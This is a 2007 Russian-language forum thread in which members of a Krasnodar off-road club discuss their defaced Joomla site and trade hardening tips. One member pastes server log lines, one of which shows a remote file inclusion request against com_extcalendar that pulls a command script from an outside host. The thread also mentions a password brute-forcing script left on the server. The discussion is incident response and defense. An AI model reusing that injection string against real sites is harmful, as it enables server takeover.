Наш сайт хакнули. :(

[БАRМАLЕЙ]

Главной страницы больше нет.
http://www.4x4krasnodar.ru/
Турки проклятые.

[135]

Турки, сука, молодцы ) растут в проф плане. Совсем недавно вообще лохи были, а теперь вишь, уже хакают помалу %-)))))
Кстати они не должны были мочкануть главную страницу, скорее всего просто повесили свой индекс.

[igor4737]

Ну да, точгно индекс, админ ау! Верни как надо!

[Kosh]

Ну да, точгно индекс, админ ау! Верни как надо!

Не волнуйтесь. Вернёт как сможет.

[BELL]

KEE, первым делом поищи .htaccess в корне с редиректом
если нет - разбирайся
а я тебя на днях предупреждал. Мне повезло - мой сайт использовали как хостинг для скриптов для кражи кредитных карт американцы - вовремя просек и прикрыл.

Никак жумлу включили в популярный сканер?

[BELL]

А дизайнеры из турков низачОтные нифига

[tolik777]

А причину нашли каким образом взломали? Где-то же находиться дырявый скрипт и надо дыру эту прикрыть.
И главное проверить все директории сайта - не оставили шелл какой-ниубдь. Т.к. обычно оставляют.

[Токайдзин]

Пардон, чем это грозит? Инфа потеряна? Хозяин хостинга несет ответственность?

[Oktan]

Я уверен, основная причина - свежая дырка в Джумле.
Есть несколько вариантов:
1. турки - порядочные хакеры, забэкапили сайт, подменили только индексовую страницу.
2. турки - немного скоты, снесли все файлы на винте сервера, базу не тронули.
3. турки - полные уроды, снесли все, что относится к движку САЙТА.
Я больше склоняюсь ко второму варианту, раз форум жив, значит базу не трогали.

[135]

Да никто ничего не бакапил, просто индексную страницу переписали.
Стопудово даже в .htaccess никто не лазил - оно им надо? Доступ получили, страничку повесили и бегом радоваться.
Ничем не грозит. Ничего же ценного не лежит там?

[Гендель]

не ну не уроды а?? лучше бы какойнить другой посерьезней зашишенный сайт грохнули хоть пацпнами-бы нормальными выглядели ну Краевой адменистации или МВД ну вообшем сурьезней. а так хулиганы пакостники непойми чего добились.

[BELL]

даже в .htaccess никто не лазил

я не смог достучаться до некоторых основных скриптов сайта. Нет, это хтаццесс, стопудов.

стопудово com_joomlaexplorer ломали - в нем есть дырки. Я его просто убил у себя - я им не пользуюсь.[/list]

[BELL]

Краевой адменистации или МВД

Не смеши

их неломают потому что хтмл, набросанный в ворде - там скриптов то нет

максимум - для сборки хтмл модулей воедино - тож неломаеццо

кстати турки тож дреамвьювером пользуются

[135]

BELL, не свети прошлое
Может и акцесс -))), вскрытие покажет
имхо жмуля не единственный возможный вариант. Не про конкретно сейчас а вообще.

[BELL]

да эт понятно
учитывая что компонентов немеряно левых, которые непонятно кто разрабатывал. Сам боюсь

но хостера врядли. Мастерхост же!!

[Гендель]

Краевой адменистации или МВД

Не смеши

их неломают потому что хтмл, набросанный в ворде - там скриптов то нет

максимум - для сборки хтмл модулей воедино - тож неломаеццо

кстати турки тож дреамвьювером пользуются

не ну ладно я не так уж хорошо разбираюсь во всем этом. просто высказал свои имоции.. Считай что пристыдил, буду на досуге пичитавать самоучитель какойнибудь по хтмл

[БАRМАLЕЙ]

Обидно на!
Почему бы Евгению не дать порядочным людям возможность оперативно реагировать на такие вещи (Беллу или Костегу например) ??????

[135]

колхоз - зло.

[БАRМАLЕЙ]

колхоз - зло.

злость - зло.

[135]

не понял к чему злость? Я просто высказал своё мнение что колхоз ни к чему хорошему не приведёт.

[BELL]

БARMALEЙ
админ должен быть один
это - ЗАКОН

[BELL]

в тему:
http://ru-mambo.ru/smf/index.php?action=printpage;topic=17157.0

КЕЕ, скорее всего я ошибался
вот она дырка, в календаре
щас буду разбираться (

[BELL]

Так, КЕЕ
ставь в .htaccess строчки

Код: Выделить всё

php_flag   register_globals off
php_flag   magic_quotes_gpc on

в globals.php ставь 0
все работает вроде
и по мелочам тут
http://joomlaportal.ru/content/view/952/70/

[BELL]

да, и естественно смена всех паролей, включая бд.
Щас нашел файл на своем хостинге - ломали тож через дыру в календаре, так он перебирает всех клиентов и брутфорсит пароли, причом исполняется на хостера же серваке. Большой плюс - ограничение времени работы всех скриптов 30 сек. Надеюсь, много подобрать он не успел

[Токайдзин]

Эй, хирурги!!?
Больной ходить будет?
Ps: Турок, - он, сцуко, подлый... Мочи козлов!

[135]

При чём тут турок?

[BELL]

Мля, класика, как в книгах
исполнили скрипт

Код: Выделить всё

172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:47:27 +0300] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

смотрели результат своих действий (скрипта ихнего)

Код: Выделить всё

172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:48:28 +0300] "GET /components/com_extcalendar/scan/index.html HTTP/1.1" 200 2267 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

ниасилил

Код: Выделить всё

172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:49:30 +0300] "GET /components/com_extcalendar/scan/google.php?q=Busca:%20inurl:agendax= HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Судя по всему, нихто не попался на удочку (кроме меня, я проверял что будет)

Код: Выделить всё

62.183.13.169 kuban4x4.ru - - [19/Mar/2007:18:54:36 +0300] "GET /components/com_extcalendar/militarybankonline.bankofamerica.com HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.6 (build 01425); .NET CLR 1.1.4322)"

вот так оно, товарищи!

[135]

Офигеть, школьники из швеции -))))
° Ср 21-Мар-2007 14:43:40, Наш сайт хакнули. - 135
° Ср 21-Мар-2007 12:04:21, СТЫД И СРАМ! (и низачот) - Гендель
° Ср 21-Мар-2007 11:32:17, Заберите этот хлам! Даже в Краснодар привезу! - Alex A. Bel.

не подумайте плохо

[БАRМАLЕЙ]

Офигеть, школьники из швеции -))))
° Ср 21-Мар-2007 14:43:40, Наш сайт хакнули. - 135
° Ср 21-Мар-2007 12:04:21, СТЫД И СРАМ! (и низачот) - Гендель
° Ср 21-Мар-2007 11:32:17, Заберите этот хлам! Даже в Краснодар привезу! - Alex A. Bel.

не подумайте плохо

никак не пойму, что ты этим хотел сказать? Расшифруй.

[135]

просто игра слов...

[Alex A. Bel.]

АфффигетЬ! вот теперь я ещё и шведский школьник

[БАRМАLЕЙ]

Alex A. Bel. привыкай...

[135]

Да ладно тупого включать %-)
шведские школьники это - www.grodmansskolan.se

[Гендель]

и что?? я наверное действитель шведский школьник потому что ваашене понял..

[nejimaki-dori]

Гы! тады не шведские,а эстонские! Гендель,не в обиду (против эстонцев тож ничего не имею!)

[BELL]

Долго они добирались до сайта ))

[733]

Ура-а-а-а-а-а-а!!!!!. Женя всё востановил. Наверно хакнули по первому варианту.

[doctor]

Ура-а-а-а-а-а-а!!!!!. Женя всё востановил. Наверно хакнули по первому варианту.

Тогда пусть сразу ставит защиту от прочих вариантов!

[БАRМАLЕЙ]

Жека маладэтс!!! [/b]

[BELL]

я был неправ - переписали конфиг
эффект тот же самый как и при редиректе - конфиг инкляйдится во все скрипты без исключения. Вотт такк, однако

Жень, все таки постарайся глобалс выключить. Надо.